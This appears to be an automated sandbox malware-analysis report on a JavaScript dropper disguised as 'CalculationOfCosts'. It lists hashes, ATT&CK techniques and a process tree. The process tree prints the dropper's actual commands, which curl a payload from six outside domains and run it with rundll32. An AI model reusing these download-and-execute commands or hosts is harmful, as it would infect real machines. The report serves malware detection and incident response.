3ad75d2449ff5a1890ffd6419bdfa53a765acb3841d8c18c51fa819a8c3d6edc

Analysis

max time kernel
244s
max time network
294s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
14/06/2023, 23:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CalculationOfCosts-51331445.js
Size

464KB
MD5

1fcda2c3df7ba82076f2b641d56beacb
SHA1

7123db27ba040e9172ee37da0c753eb21252db43
SHA256

e7b928d2dfa33c0828afcdd91d31b11cb4b586b8160f5d3204b4544c560ed074
SHA512

5f5649bc151ee29a607740bfe978763f0a14e8bc020bc195d7cefb24cf15933e468097c53522458c88a6844bc0212b43197ba20070dfdcafb12b2c9f544bfd21
SSDEEP

6144:LmFamddP19SiU+g9ITla9MGNs9yec26VZU6BboaI7CRY7kkhl:oLU3+gPZUW0F

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1488	timeout.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 2868 wrote to memory of 3372	2868	wscript.exe	92
PID 2868 wrote to memory of 3372	2868	wscript.exe	92
PID 2868 wrote to memory of 3676	2868	wscript.exe	94
PID 2868 wrote to memory of 3676	2868	wscript.exe	94
PID 2868 wrote to memory of 2032	2868	wscript.exe	95
PID 2868 wrote to memory of 2032	2868	wscript.exe	95
PID 2868 wrote to memory of 888	2868	wscript.exe	98
PID 2868 wrote to memory of 888	2868	wscript.exe	98
PID 2868 wrote to memory of 2892	2868	wscript.exe	100
PID 2868 wrote to memory of 2892	2868	wscript.exe	100
PID 2868 wrote to memory of 5064	2868	wscript.exe	102
PID 2868 wrote to memory of 5064	2868	wscript.exe	102
PID 2868 wrote to memory of 4128	2868	wscript.exe	104
PID 2868 wrote to memory of 4128	2868	wscript.exe	104
PID 4128 wrote to memory of 1488	4128	cmd.exe	106
PID 4128 wrote to memory of 1488	4128	cmd.exe	106
PID 2032 wrote to memory of 524	2032	cmd.exe	107
PID 2032 wrote to memory of 524	2032	cmd.exe	107
PID 888 wrote to memory of 2156	888	cmd.exe	108
PID 888 wrote to memory of 2156	888	cmd.exe	108
PID 5064 wrote to memory of 1332	5064	cmd.exe	111
PID 5064 wrote to memory of 1332	5064	cmd.exe	111
PID 2892 wrote to memory of 2332	2892	cmd.exe	109
PID 2892 wrote to memory of 2332	2892	cmd.exe	109
PID 3676 wrote to memory of 2344	3676	cmd.exe	110
PID 3676 wrote to memory of 2344	3676	cmd.exe	110
PID 3372 wrote to memory of 2668	3372	cmd.exe	112
PID 3372 wrote to memory of 2668	3372	cmd.exe	112
PID 4128 wrote to memory of 2940	4128	cmd.exe	113
PID 4128 wrote to memory of 2940	4128	cmd.exe	113

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\CalculationOfCosts-51331445.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2868
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://rapiska.com/0.26094510721362707.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3372
- - C:\Windows\system32\curl.exe
    curl https://rapiska.com/0.26094510721362707.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
    3⤵
    PID:2668
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://tamimak.com/0.7176355941188413.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3676
- - C:\Windows\system32\curl.exe
    curl https://tamimak.com/0.7176355941188413.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
    3⤵
    PID:2344
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://corfinka.com/0.7743318296418786.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Windows\system32\curl.exe
    curl https://corfinka.com/0.7743318296418786.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
    3⤵
    PID:524
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://qderika.com/0.9526327500454457.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:888
- - C:\Windows\system32\curl.exe
    curl https://qderika.com/0.9526327500454457.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
    3⤵
    PID:2156
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://bilaska.com/0.6255398467253935.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\system32\curl.exe
    curl https://bilaska.com/0.6255398467253935.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
    3⤵
    PID:2332
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Koltes\Fertiol & curl https://nirause.com/0.9949143938154678.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5064
- - C:\Windows\system32\curl.exe
    curl https://nirause.com/0.9949143938154678.dat --output C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX
    3⤵
    PID:1332
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX,must
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4128
- - C:\Windows\system32\timeout.exe
    timeout 10
    3⤵
    - Delays execution with timeout.exe
    PID:1488
- - C:\Windows\system32\rundll32.exe
    rundll32 C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX,must
    3⤵
    PID:2940

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
12KB

MD5
2313a8e859366ccf938d9673a3e5d0bd

SHA1
94fa9d26dda046c753c89df51eec21e681b7e516

SHA256
cb2ab390ffd1a923008f95abaf34fd8c5ff186264e925ec32ef3616780b81060

SHA512
4400692bb7b6e2dd4b36ea1c8e37ec8ae9a9cfa6c2b541990afdb36a86b2bc30b8900a13c5a757781b7a79cdd6f6b5170ac7968746d9fb90fdaf10c245de9474

Download Submit
C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
12KB

MD5
2313a8e859366ccf938d9673a3e5d0bd

SHA1
94fa9d26dda046c753c89df51eec21e681b7e516

SHA256
cb2ab390ffd1a923008f95abaf34fd8c5ff186264e925ec32ef3616780b81060

SHA512
4400692bb7b6e2dd4b36ea1c8e37ec8ae9a9cfa6c2b541990afdb36a86b2bc30b8900a13c5a757781b7a79cdd6f6b5170ac7968746d9fb90fdaf10c245de9474

Download Submit
C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
12KB

MD5
2313a8e859366ccf938d9673a3e5d0bd

SHA1
94fa9d26dda046c753c89df51eec21e681b7e516

SHA256
cb2ab390ffd1a923008f95abaf34fd8c5ff186264e925ec32ef3616780b81060

SHA512
4400692bb7b6e2dd4b36ea1c8e37ec8ae9a9cfa6c2b541990afdb36a86b2bc30b8900a13c5a757781b7a79cdd6f6b5170ac7968746d9fb90fdaf10c245de9474

Download Submit
C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
28KB

MD5
630f9a72692810a09c496e4c474f0e67

SHA1
019149c1463b3391dccd87dfca61e59eb440b3ef

SHA256
a16847ad38b3fe738ac6bbaabeb0965e44f406bb9ded6455043e9a0d8eb97180

SHA512
9874a9ccac847107b9cff5c80b101940aedbb5f8ee0371c7245988bbbbca5f71d87a2e1c05b3873a4971319b9f961798085c08005ae08eb359eb4bae547f3786

Download Submit
C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
12KB

MD5
2313a8e859366ccf938d9673a3e5d0bd

SHA1
94fa9d26dda046c753c89df51eec21e681b7e516

SHA256
cb2ab390ffd1a923008f95abaf34fd8c5ff186264e925ec32ef3616780b81060

SHA512
4400692bb7b6e2dd4b36ea1c8e37ec8ae9a9cfa6c2b541990afdb36a86b2bc30b8900a13c5a757781b7a79cdd6f6b5170ac7968746d9fb90fdaf10c245de9474

Download Submit
C:\Koltes\Fertiol\Floster.OOOOCCCCCXXXXX

Filesize
246KB

MD5
f24a1ccab546f52edb8ca2061b133e4a

SHA1
c0fc6b417adecbd804bf1b943fad09a5be5add25

SHA256
f0117670f4e2410359f119e31cf032132130821ead5a48cd1fdc39c63ce3d18f

SHA512
93f91f7fbbc159c390333bc5020953e9535ec918176b7d51c2d4f4bbacc384e193ccd1cc048e720684a28dda573c4724d77ec234d0b7abd1c34051d1bc1383f6

Download Submit